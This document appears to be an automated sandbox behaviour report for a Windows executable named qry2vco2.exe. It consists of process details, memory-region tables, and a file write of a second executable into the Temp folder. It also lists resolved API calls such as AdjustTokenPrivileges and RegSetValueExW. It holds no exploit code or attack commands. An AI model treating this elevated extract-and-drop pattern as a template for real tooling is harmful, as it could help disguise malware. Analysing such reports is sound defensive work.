2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "WinMail.exe.mui" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #115: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #115 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:24, Reason: Child Process |
| Unmonitor | End Time: 00:02:47, Reason: Self Terminated |
| Monitor Duration | 00:00:23 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb3c |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
F20
0x
208
0x
2C0
0x
43C
0x
510
0x
334
0x
458
0x
B04
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000005dc6af0000 | 0x5dc6af0000 | 0x5dc6b0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005dc6af0000 | 0x5dc6af0000 | 0x5dc6afffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005dc6b00000 | 0x5dc6b00000 | 0x5dc6b06fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005dc6b10000 | 0x5dc6b10000 | 0x5dc6b23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005dc6b30000 | 0x5dc6b30000 | 0x5dc6c2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005dc6c30000 | 0x5dc6c30000 | 0x5dc6c33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005dc6c40000 | 0x5dc6c40000 | 0x5dc6c41fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x5dc6c50000 | 0x5dc6d0dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005dc6d10000 | 0x5dc6d10000 | 0x5dc6d10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005dc6d20000 | 0x5dc6d20000 | 0x5dc6d26fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005dc6d30000 | 0x5dc6d30000 | 0x5dc6d30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005dc6d40000 | 0x5dc6d40000 | 0x5dc6e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005dc6e40000 | 0x5dc6e40000 | 0x5dc6f3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005dc6f40000 | 0x5dc6f40000 | 0x5dc703ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x5dc6f40000 | 0x5dc7015fff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x5dc6f40000 | 0x5dc6f73fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005dc6f40000 | 0x5dc6f40000 | 0x5dc6f40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005dc6f50000 | 0x5dc6f50000 | 0x5dc6f50fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005dc6f60000 | 0x5dc6f60000 | 0x5dc6f9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005dc6f60000 | 0x5dc6f60000 | 0x5dc6f62fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x5dc6f70000 | 0x5dc6f70fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005dc6f80000 | 0x5dc6f80000 | 0x5dc6f81fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005dc6f90000 | 0x5dc6f90000 | 0x5dc6f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005dc7030000 | 0x5dc7030000 | 0x5dc703ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x5dc7040000 | 0x5dc7376fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005dc7380000 | 0x5dc7380000 | 0x5dc747ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005dc7480000 | 0x5dc7480000 | 0x5dc757ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005dc7580000 | 0x5dc7580000 | 0x5dc767ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005dc7680000 | 0x5dc7680000 | 0x5dc777ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005dc7780000 | 0x5dc7780000 | 0x5dc7907fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005dc7910000 | 0x5dc7910000 | 0x5dc7a90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005dc7aa0000 | 0x5dc7aa0000 | 0x5dc8e9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005dc8ea0000 | 0x5dc8ea0000 | 0x5dc8f9ffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x5dc8fa0000 | 0x5dc90e0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5fffe0000 | 0x7df5fffe0000 | 0x7ff5fffdffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff75682e000 | 0x7ff75682e000 | 0x7ff75682ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff756830000 | 0x7ff756830000 | 0x7ff75692ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff756930000 | 0x7ff756930000 | 0x7ff756952fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff756953000 | 0x7ff756953000 | 0x7ff756954fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756955000 | 0x7ff756955000 | 0x7ff756955fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756956000 | 0x7ff756956000 | 0x7ff756957fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756958000 | 0x7ff756958000 | 0x7ff756959fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75695a000 | 0x7ff75695a000 | 0x7ff75695bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75695c000 | 0x7ff75695c000 | 0x7ff75695dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75695e000 | 0x7ff75695e000 | 0x7ff75695ffff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff757890000 | 0x7ff757896fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ffc47230000 | 0x7ffc4727afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4cbd0000 | 0x7ffc4ce43fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #117: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #117 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5d8 |
| Parent PID | 0xcd4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FE8
0x
73C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00210000 | 0x00239fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00280000 | 0x0033dfff | Memory Mapped File | r |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0082ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00807fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x0082ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x009b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x01dbffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001dc0000 | 0x01dc0000 | 0x01eaffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x740d0000 | 0x74161fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
